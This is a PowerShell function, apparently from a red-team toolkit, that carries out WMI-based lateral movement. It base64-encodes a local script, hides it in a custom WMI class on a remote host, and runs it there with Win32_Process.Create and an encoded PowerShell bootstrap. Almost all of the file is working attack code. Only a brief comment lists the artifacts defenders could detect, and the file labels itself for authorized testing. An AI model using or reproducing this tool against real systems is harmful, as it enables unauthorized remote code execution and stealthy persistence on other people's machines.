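function Send-And-Execute {
    <#
    .SYNOPSIS
    Stage a PowerShell script on a remote host inside a custom WMI class, then run it there.

    .DESCRIPTION
    Lateral-movement / file-transfer helper (authorized testing only). It:
      1. Reads $LocalPath as text and base64-encodes it as UTF-16LE, the form
         `powershell -EncodedCommand` expects.
      2. Connects to \\$IP\root\default with the supplied credentials and writes
         the encoded script into property 'EvilProperty' of a new class
         'Win32_EvilClass' (the class persists in the remote WMI repository).
      3. Calls Win32_Process.Create on $IP with a small bootstrap that reads the
         property back from the local repository and executes it.

    The original version hard-coded ComputerName '10.1.0.2' for step 3 while the
    class was written to $IP, so the bootstrap could never find the class unless
    the two happened to coincide; the process is now started on $IP.

    Operational notes:
      - Only text scripts work: the content is re-encoded as UTF-16LE text, so a
        binary file would be corrupted (a ReadAllBytes variant was dropped for
        this reason).
      - The carrier class is NOT removed here, because the remote process reads
        it asynchronously after this function returns. Clean up afterwards with
        ([WmiClass]"\\$IP\root\default:Win32_EvilClass").Delete() once the
        payload has run.
      - $Password travels in clear text into this function and into a PSCredential;
        prefer to obtain it from a secure source rather than a script literal.
      - For defenders: a remote Win32_Process.Create whose command line is
        `powershell -NoProfile -EncodedCommand ...`, and a non-standard class
        appearing in root\default, are the artifacts this leaves behind.

    .PARAMETER Username
    Account used for both the WMI connection and Invoke-WmiMethod (e.g. DOMAIN\user or host\user).
    .PARAMETER Password
    Clear-text password for $Username.
    .PARAMETER IP
    Target host where the class is stored and the script is executed.
    .PARAMETER LocalPath
    Path of the local PowerShell script to send.

    .OUTPUTS
    The Invoke-WmiMethod result (ReturnValue and ProcessId of the remote process).

    .NOTES
    Throws if the local file cannot be read or is empty, if the WMI connection
    fails, or if Win32_Process.Create reports a non-zero ReturnValue.
    #>
    param(
        [ValidateNotNullOrEmpty()][string]$Username,
        [ValidateNotNullOrEmpty()][string]$Password,
        [ValidateNotNullOrEmpty()][string]$IP,
        [ValidateNotNullOrEmpty()][string]$LocalPath
    )

    # -ErrorAction Stop: Get-Content's failure is non-terminating by default and
    # would otherwise surface later as a confusing null-argument error.
    $script = Get-Content -LiteralPath $LocalPath -Raw -ErrorAction Stop
    if ([string]::IsNullOrEmpty($script)) {
        throw "'$LocalPath' is empty; nothing to send."
    }
    $encodedScript = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script))

    # Explicit-credential connection to the remote root\default namespace.
    $connOptions = New-Object Management.ConnectionOptions
    $connOptions.Username = $Username
    $connOptions.Password = $Password
    $connOptions.EnablePrivileges = $true
    $scope = New-Object Management.ManagementScope
    $scope.Path = "\\$IP\root\default"
    $scope.Options = $connOptions
    $scope.Connect()

    # Create the carrier class holding the encoded script; Put() persists it.
    # Put() returns a ManagementPath; discard it so it does not leak into the
    # function's output stream.
    $carrier = New-Object Management.ManagementClass($scope, [String]::Empty, $null)
    $carrier['__CLASS'] = 'Win32_EvilClass'
    $carrier.Properties.Add('EvilProperty', [Management.CimType]::String, $false)
    $carrier.Properties['EvilProperty'].Value = $encodedScript
    [void]$carrier.Put()

    # Bootstrap that runs ON the target: read the property from its own repository
    # and execute it. Single-quoted here-string so $encodedFile is expanded there,
    # not here.
    $bootstrap = @'
$encodedFile = ([WmiClass]'root\default:Win32_EvilClass').Properties['EvilProperty'].Value
powershell -NoProfile -EncodedCommand $encodedFile
'@
    $encodedBootstrap = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($bootstrap))

    $securePassword = ConvertTo-SecureString $Password -AsPlainText -Force
    $credential = New-Object System.Management.Automation.PSCredential($Username, $securePassword)

    # Not named $args: that is an automatic variable in PowerShell.
    # ComputerName is $IP so the bootstrap runs where the class was written.
    $invokeParams = @{
        Credential   = $credential
        ComputerName = $IP
        Class        = 'Win32_Process'
        Name         = 'Create'
        ArgumentList = "powershell -NoProfile -EncodedCommand $encodedBootstrap"
    }
    $result = Invoke-WmiMethod @invokeParams

    # Win32_Process.Create reports 0 on success; anything else means no process started.
    if ($result.ReturnValue -ne 0) {
        throw "Win32_Process.Create on $IP failed with ReturnValue $($result.ReturnValue)."
    }
    $result
}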